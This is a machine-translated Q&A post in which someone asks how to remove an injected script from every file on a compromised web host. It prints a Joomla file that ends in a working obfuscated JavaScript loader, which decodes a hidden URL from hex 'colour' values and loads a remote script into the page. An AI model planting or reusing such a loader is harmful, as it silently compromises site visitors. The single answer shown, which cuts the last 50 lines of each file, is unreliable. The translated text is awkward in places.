这是背景故事。我有一个朋友,主人被一个跨站点脚本攻击所淹没。
底部的以下脚本已添加到所有文件的底部。有没有人有awk或sed命令来删除它? (文件中可能还有其他javascript)
出现脚本已添加到主机上的所有文件中。 HTML PHP JS。
有些文件的php在新行上开始有些没有。我需要在文件中的任何位置找到该脚本部分并将其删除。
<?php
/**
* @version $Id: COPYRIGHT.php 14401 2010-01-26 14:10:00Z louis $
* @package Joomla
* @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
*/
defined('_JEXEC') or die('Restricted access');
?>
Joomla! derives from copyrighted works licensed under the GNU General
Public License. This version has been modified pursuant to the
GNU General Public License as of September 15, 2005, and as distributed,
it includes or is derivative of works licensed under the GNU General
Public License or other free or open source software licenses. Please
see the CREDITS.php for a non-exhaustive list of contributors and
copyright holders. A full text version of the GNU GPL version 2 can be
found in the LICENSE.php file. A full text version of the other licenses
that Joomla! is derivative of or includes can be found in LICENSES.php.<script>
function vdch() {
if(document.all.length > 3) {
var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');
var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }
var dch = document.createElement("script");
dch.id = "dchid";
dch.src = dchid;
document.all[3].appendChild(dch);
} else {
setTimeout("vdch()",500);
}
} setTimeout("vdch()",500);
</script>
答案 0 :(得分:1)
答案 1 :(得分:0)
head -n -50 yourFile
50行